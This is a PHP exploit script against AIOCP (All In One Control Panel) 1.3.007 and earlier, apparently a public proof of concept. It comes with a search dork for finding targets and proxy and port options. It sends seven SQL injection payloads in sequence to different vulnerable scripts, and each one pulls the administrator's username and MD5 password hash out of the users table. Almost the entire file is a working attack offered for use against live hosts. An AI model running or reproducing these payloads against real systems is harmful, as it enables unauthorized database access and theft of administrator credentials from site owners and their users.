<?php
print_r('
--------------------------------------------------------------------------------
AIOCP <= 1.3.007 multiple SQL injection vulnerabilities/hash disclosure xploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "Powered by Tecnick.com AIOCP (All In One Control Panel)"
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to AIOCP
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]:    "    a proxy
 -T[prefix]:     "    a table prefix other than default (aiocp_)
 -u[id]:         "    a user id to retrieve the hash of (2 -> admin one)
Example:
php '.$argv[0].' localhost /AIOCP/ -P1.1.1.1:80
php '.$argv[0].' localhost /AIOCP/ -p81
php '.$argv[0].' localhost /AIOCP/ -Tcp_
php '.$argv[0].' localhost /AIOCP/ -u3
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

function show_result()
{
global $admin,$hash;
print_r('
------------------------------------------------------------
admin          -> '.$admin.'
pwd hash (md5) -> '.$hash.'
------------------------------------------------------------
');
}

$host=$argv[1];
$path=$argv[2];
$prefix="aiocp_";
$uid=2; //admin
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-t","",$argv[$i]);
}
if ($temp=="-u")
{
  $uid=(int)str_replace("-u","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$t1=my_encode("<USER>");
$t2=my_encode("<HASH>");

//*wherequery* one, this works regardless of php.ini settings
$sql="WHERE/**/1=0/**/UNION/**/SELECT/**/1,1,CONCAT(".$t1.",user_name,".$t1."),CONCAT(".$t2.",user_password,".$t2."),1/**/FROM/**/".$prefix."users/**/WHERE/**/user_id=".$uid."/*";
$data ="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"wherequery\"\r\n\r\n";
$data.=$sql."\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$p."public/code/cp_dictionary_rss.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("<USER>",$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}

// *hp* one, this works regardless of magic_quotes_gpc setring because of urldecode()
// some tricks added for basename()...
$sql="/9999%2527UNION%20SELECT%20CONCAT(".$t2.",user_password,".$t2.")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."%20and%20%2527a%2527=%2527a/";
$packet ="GET ".$p."public/code/cp_show_page_help.php?hp=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<HASH>",$html);
$hash=$temp[1];
$sql="/9999%2527UNION%20SELECT%20CONCAT(".$t1.",user_name,".$t1.")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."%20and%20%2527a%2527=%2527a/";
$packet ="GET ".$p."public/code/cp_show_page_help.php?hp=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<USER>",$html);
$admin=$temp[1];
if (is_hash($hash))
{die(show_result());}

//*warranty_id* one, some dirty strings for unserialize(), works regardless of magic_quotes_gpc settings
$temp='a:9:{s:3:"aaa";s:0:"";s:3:"eng";s:44:"';
$temp2='";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";s:3:"aaa";s:33:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";}';
$sql="9999%20UNION%20SELECT%201,1,CONCAT(".my_encode($temp).",".$t2.",user_password,".$t2.",".my_encode($temp2).")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
$packet ="GET ".$p."public/code/cp_show_ec_warranty.php?warranty_id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<HASH>",$html);
$hash=$temp[1];
for ($i=1; $i<20; $i++)
{
  $temp='a:9:{s:3:"aaa";s:0:"";s:3:"eng";s:'.$i.':"';
  $sql="9999%20UNION%20SELECT%201,1,CONCAT(".my_encode($temp).",".$t1.",user_name,".$t1.",".my_encode($temp2).")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
  $packet ="GET ".$p."public/code/cp_show_ec_warranty.php?warranty_id=$sql HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/plain\r\n";
  $packet.="Connection: Close\r\n\r\n";
  sendpacketii($packet);
  $admin="";
  if (eregi("<USER>",$html))
  {
   $temp=explode("<USER>",$html);
   $admin=$temp[1];break;
  }
}
if (is_hash($hash))
{die(show_result());}

//*aiocp_dp* one, this works with magic_quotes_gpc=off
$sql="'/**/and/**/0/**/UNION/**/SELECT/**/1,1,1,CONCAT(".$t2.",user_password,".$t2."),CONCAT(".$t1.",user_name,".$t1."),1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/user_id=$uid/*";
$data ="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"aiocp_dp\"\r\n\r\n";
$data.=$sql."\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$p."public/code/cp_dpage.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("<USER>",$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}

//*product_category_id* one, using two UNIONs to reach the vulnerable query, works with magig_quotes_gpc=off
$sql="9999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1%2C1%2C0%2C1%2C0%2C1%2CCHAR%2897%2C58%2C50%2C58%2C123%2C115%2C58%2C51%2C58%2C34%2C101%2C110%2C103%2C34%2C59%2C115%2C58%2C55%2C58%2C34%2C86%2C97%2C114%2C105%2C111%2C117%2C115%2C34%2C59%2C115%2C58%2C51%2C58%2C34%2C105%2C116%2C97%2C34%2C59%2C115%2C58%2C52%2C58%2C34%2C86%2C97%2C114%2C105%2C34%2C59%2C125%29%2CCHAR%2897%2C58%2C50%2C58%2C123%2C115%2C58%2C51%2C58%2C34%2C101%2C110%2C103%2C34%2C59%2C115%2C58%2C49%2C54%2C58%2C34%2C86%2C97%2C114%2C105%2C111%2C117%2C115%2C32%2C112%2C114%2C111%2C100%2C117%2C99%2C116%2C115%2C34%2C59%2C115%2C58%2C51%2C58%2C34%2C105%2C116%2C97%2C34%2C59%2C115%2C58%2C49%2C51%2C58%2C34%2C80%2C114%2C111%2C100%2C111%2C116%2C116%2C105%2C32%2C118%2C97%2C114%2C105%2C34%2C59%2C125%29%2CCHAR%2897%2C118%2C46%2C103%2C105%2C102%29%2F%2A%2A%2FFROM%2F%2A%2A%2F".$prefix."users%2F%2A%2A%2FWHERE%2F%2A%2A%2Fuser_id%3D".$uid."%2F%2A%27%29UNION+SELECT+1%2CCONCAT%28CHAR%2860%2C85%2C83%2C69%2C82%2C62%29%2Cuser_name%2CCHAR%2860%2C47%2C85%2C83%2C69%2C82%2C62%29%29%2CCONCAT%28CHAR%2860%2C80%2C87%2C68%2C95%2C72%2C65%2C83%2C72%2C62%29%2Cuser_password%2CCHAR%2860%2C47%2C80%2C87%2C68%2C95%2C72%2C65%2C83%2C72%2C62%29%29%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+FROM+".$prefix."users+WHERE+user_id%3D".$uid."%2F%2A%2A%2FLIMIT%2F%2A%2A%2F1%2F%2A";
$packet ="GET ".$p."public/code/cp_show_ec_froogle.php?product_category_id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<USER>",$html);
$temp2=explode("</USER>",$temp[1]);
$admin=$temp2[0];
$temp=explode("<PWD_HASH>",$html);
$temp2=explode("</PWD_HASH>",$temp[1]);
$hash=$temp2[0];
if (is_hash($hash))
{die(show_result());}

//*rid* one,works with magic_quotes_gpc = off
$sql="'UNION%20SELECT%201,1,1,1,1,CONCAT(".$t1.",user_name,".$t1."),1,CONCAT(".$t2.",user_password,".$t2."),1,1,1,1%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
$packet ="GET ".$p."public/code/cp_reviews.php?rid=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode(htmlentities("<USER>"),$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}

//*did* one,works with magic_quotes_gpc = off
$sql="9999%27%20UNION%20SELECT%201,1,CONCAT(".$t1.",user_name,".$t1."),1,1,1,1,CONCAT(".$t2.",user_password,".$t2."),1,1,1,1,1,1,1%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
$packet ="GET ".$p."public/code/cp_downloads.php?did=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode(htmlentities("<USER>"),$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}
echo "exploit failed...";
?>